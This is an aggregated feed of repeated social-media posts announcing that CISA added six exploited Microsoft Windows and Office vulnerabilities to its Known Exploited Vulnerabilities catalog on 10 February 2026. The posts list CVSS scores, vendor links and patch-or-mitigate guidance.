- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21510 - High (8.8)
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21510/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
12 posts
🟠 CVE-2026-21513 - High (8.8)
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21513/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21513 - High (8.8)
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21513/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
11 posts
🟠 CVE-2026-21519 - High (7.8)
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21519/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21519 - High (7.8)
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21519/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
11 posts
1 repos
🟠 CVE-2026-21533 - High (7.8)
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21533/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21533
